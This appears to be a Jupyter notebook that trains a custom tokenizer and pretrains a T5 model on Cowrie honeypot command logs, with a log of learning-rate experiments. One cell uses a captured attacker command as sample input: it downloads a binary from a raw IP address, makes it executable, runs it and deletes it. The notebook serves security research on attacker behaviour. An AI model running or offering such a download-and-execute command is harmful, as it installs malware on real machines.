In [ ]:
!pip install datasets

###output.csv

In [ ]:
!wget https://raw.githubusercontent.com/huggingface/transformers/main/examples/flax/language-modeling/run_t5_mlm_flax.py
!wget https://raw.githubusercontent.com/yenrongchen/data/main/output.csv

In [ ]:
import pandas as pd
from datasets import Dataset

cowrie = pd.read_csv("output.csv")
cowrie = cowrie.dropna(axis = 0, how = 'any', subset = ['input'])

cowrie_dataset = Dataset.from_pandas(cowrie)
cowrie_dataset

In [ ]:
from transformers import AutoTokenizer
org_tokenizer = AutoTokenizer.from_pretrained("google/flan-t5-base")

In [ ]:
def get_training_corpus(dataset):
    for start_idx in range(0, len(dataset), 1000):
        samples = dataset[start_idx : start_idx + 1000]
        yield samples['input']

training_corpus = get_training_corpus(cowrie_dataset)

In [ ]:
tokenizer = org_tokenizer.train_new_from_iterator(training_corpus, 6437)

In [ ]:
example = "wget http://46.23.109.212/x86; chmod +x x86; ./x86; rm -rf x86"

tokens = org_tokenizer.tokenize(example)
tokens

In [ ]:
tokens = tokenizer.tokenize(example)
tokens

In [ ]:
tokenizer.save_pretrained("flan-t5-finetuned_tokenizer")

In [ ]:
from transformers import T5Config

config = T5Config.from_pretrained("google/flan-t5-base", vocab_size = len(tokenizer))
config.save_pretrained("flan-t5-base_config")

In [ ]:
from huggingface_hub import notebook_login
notebook_login()

lr = 1e-4; 6 epochs => acc: 0.4741 ( max )、0.4569 ( final ), eval_loss: 22.86 to 18.81 -> cowrie_1

lr = 5e-5; 6 epochs => eval_acc: 0.2004 to 0.472, eval_loss: 21.99 to 18.92 -> cowrie_2 [**最佳模型!**]

lr = 5e-5; 6 epochs; no weight decay => acc: 0.472, eval_loss: 21.99 to 18.91 -> cowrie_3

lr = 5e-5; 4 epochs => acc: 0.4741, eval_loss: 22 to 19.65 -> cowrie_4

lr = 5e-5; 10 epochs => acc: 0.4784 ( max )、 0.4591 ( final ), eval_loss: 22 to 16.73 -> cowrie_10ep

lr = 5e-5; 20 epochs => acc: 0.4741 ( max )、 0.403 ( final ), eval_loss: 22 to 16.1 -> cowrie_20ep

In [ ]:
!python run_t5_mlm_flax.py \
    --output_dir="T5-finetuned_cowrie_4" \
	--model_type="t5" \
	--config_name="flan-t5-base_config" \
	--tokenizer_name="flan-t5-finetuned_tokenizer" \
	--dataset_name="yenrong/cowrie_dataset" \
	--max_seq_length="256" \
	--learning_rate="5e-5" \
	--weight_decay="0.01" \
	--warmup_steps="30" \
    --num_train_epochs="4" \
    --logging_steps="100" \
    --eval_steps="22" \
	--save_steps="91" \
	--overwrite_output_dir \
	--push_to_hub